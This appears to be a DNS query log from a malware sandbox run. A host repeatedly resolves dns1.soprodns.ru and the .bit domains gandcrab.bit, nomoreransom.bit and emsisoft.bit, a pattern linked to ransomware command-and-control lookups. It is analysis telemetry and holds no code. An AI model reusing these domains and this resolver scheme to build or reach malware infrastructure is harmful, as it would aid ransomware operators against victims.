Aug 31, 2022 23:49:19.687489033 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:20.744438887 CEST	192.168.2.6	8.8.8.8	0x1b2c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.364559889 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:21.389710903 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.410257101 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:21.437589884 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:21.461711884 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:22.729974031 CEST	192.168.2.6	8.8.8.8	0xf422	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.828344107 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:22.846611977 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.865636110 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:22.885858059 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.906522989 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:24.181659937 CEST	192.168.2.6	8.8.8.8	0x944e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.843636036 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:24.863671064 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.882021904 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:24.900788069 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:24.926548004 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:26.173096895 CEST	192.168.2.6	8.8.8.8	0x6a3c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.742422104 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:26.766419888 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.794256926 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:26.819000959 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:26.845475912 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:32.760355949 CEST	192.168.2.6	8.8.8.8	0x778b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:33.801712990 CEST	192.168.2.6	8.8.8.8	0x778b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:33.948062897 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:33.965954065 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:33.986495972 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:34.009679079 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:34.029794931 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:35.228359938 CEST	192.168.2.6	8.8.8.8	0xa02c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:36.246831894 CEST	192.168.2.6	8.8.8.8	0xa02c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.234587908 CEST	192.168.2.6	8.8.8.8	0xa02c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.414644003 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:37.435153961 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.460208893 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:37.493947983 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:37.527287960 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:38.629677057 CEST	192.168.2.6	8.8.8.8	0x9841	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.190716982 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:39.210927963 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.232388020 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:39.251383066 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:39.272142887 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:40.533377886 CEST	192.168.2.6	8.8.8.8	0xb43c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:41.548500061 CEST	192.168.2.6	8.8.8.8	0xb43c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.563077927 CEST	192.168.2.6	8.8.8.8	0xb43c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.830462933 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:42.850589037 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.870748997 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:42.892258883 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:42.910756111 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:43.926912069 CEST	192.168.2.6	8.8.8.8	0xa38b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:44.985625029 CEST	192.168.2.6	8.8.8.8	0xa38b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:45.985445023 CEST	192.168.2.6	8.8.8.8	0xa38b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.167262077 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:46.187199116 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.207613945 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:46.227968931 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:46.246339083 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:47.290848970 CEST	192.168.2.6	8.8.8.8	0x888a	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:48.499587059 CEST	192.168.2.6	8.8.8.8	0x888a	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:49.956358910 CEST	192.168.2.6	8.8.8.8	0x888a	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.054864883 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:50.073091984 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.142801046 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:50.167078018 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:50.186178923 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:52.769992113 CEST	192.168.2.6	8.8.8.8	0xe105	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.309271097 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:53.336150885 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.354264975 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:53.372548103 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:53.390899897 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:53.746059895 CEST	192.168.2.6	8.8.8.8	0x2c41	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.293313026 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:54.327765942 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.349513054 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:54.371674061 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.397249937 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:54.752284050 CEST	192.168.2.6	8.8.8.8	0x2fb6	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.810272932 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:54.828233004 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.851675987 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:54.873826027 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:54.897558928 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:55.329066992 CEST	192.168.2.6	8.8.8.8	0xe3e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:56.358541012 CEST	192.168.2.6	8.8.8.8	0xe3e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.000348091 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:57.020057917 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.038532972 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:57.058875084 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.078872919 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:57.445333958 CEST	192.168.2.6	8.8.8.8	0x54e0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.516345978 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:57.536552906 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.561312914 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:57.581695080 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:57.601932049 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:57.951314926 CEST	192.168.2.6	8.8.8.8	0x3737	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:58.940262079 CEST	192.168.2.6	8.8.8.8	0x3737	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.045651913 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:59.065542936 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.087832928 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:59.107861042 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:59.128176928 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:49:59.493012905 CEST	192.168.2.6	8.8.8.8	0x6ea0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:00.513597965 CEST	192.168.2.6	8.8.8.8	0x6ea0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.178349018 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:01.196441889 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.216655016 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:01.237344027 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:01.261420965 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:01.616338968 CEST	192.168.2.6	8.8.8.8	0xe543	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:02.627542019 CEST	192.168.2.6	8.8.8.8	0xe543	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.219702959 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.241400003 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.259742975 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:03.325418949 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.343590975 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:03.807167053 CEST	192.168.2.6	8.8.8.8	0x51e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.859025002 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:03.877265930 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.897270918 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:03.917309046 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:03.935067892 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:04.372958899 CEST	192.168.2.6	8.8.8.8	0xf3aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.468360901 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:04.486609936 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.504698038 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:04.523119926 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:04.543015003 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:05.013535976 CEST	192.168.2.6	8.8.8.8	0xa538	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.002994061 CEST	192.168.2.6	8.8.8.8	0xa538	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.159151077 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:06.176892996 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.195981979 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:06.216034889 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:06.235821962 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:06.749398947 CEST	192.168.2.6	8.8.8.8	0xd5a5	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.752329111 CEST	192.168.2.6	8.8.8.8	0xd5a5	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.872886896 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:07.911994934 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:07.952331066 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:08.063038111 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:08.085752010 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:09.104058981 CEST	192.168.2.6	8.8.8.8	0x9165	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:10.170181990 CEST	192.168.2.6	8.8.8.8	0x9165	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:11.685503960 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:11.740057945 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:11.785305023 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:11.805562019 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:11.917623043 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:12.346817970 CEST	192.168.2.6	8.8.8.8	0x3d0f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.390027046 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:12.408514977 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.431169033 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:12.453787088 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:12.473746061 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:12.822731972 CEST	192.168.2.6	8.8.8.8	0xead9	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.451406002 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:13.477447033 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.505570889 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:13.529988050 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.551243067 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:13.907250881 CEST	192.168.2.6	8.8.8.8	0x71e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:13.974622965 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:13.994431019 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.017877102 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:14.041220903 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.061249018 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:50:14.448813915 CEST	192.168.2.6	8.8.8.8	0xe1fb	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:14.985992908 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:15.005623102 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.024115086 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:15.044470072 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:15.074779987 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:50:15.435657024 CEST	192.168.2.6	8.8.8.8	0x45ab	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:16.435070992 CEST	192.168.2.6	8.8.8.8	0x45ab	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.148379087 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:17.168323040 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.191071033 CEST	192.168.2.6	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:17.209347010 CEST	192.168.2.6	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:17.227550983 CEST	192.168.2.6	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Aug 31, 2022 23:50:17.566294909 CEST	192.168.2.6	8.8.8.8	0xe55c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.609033108 CEST	192.168.2.6	8.8.8.8	0xe55c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:50:18.620011091 CEST	192.168.2.6	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:50:18.663878918 CEST	192.168.2.6	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
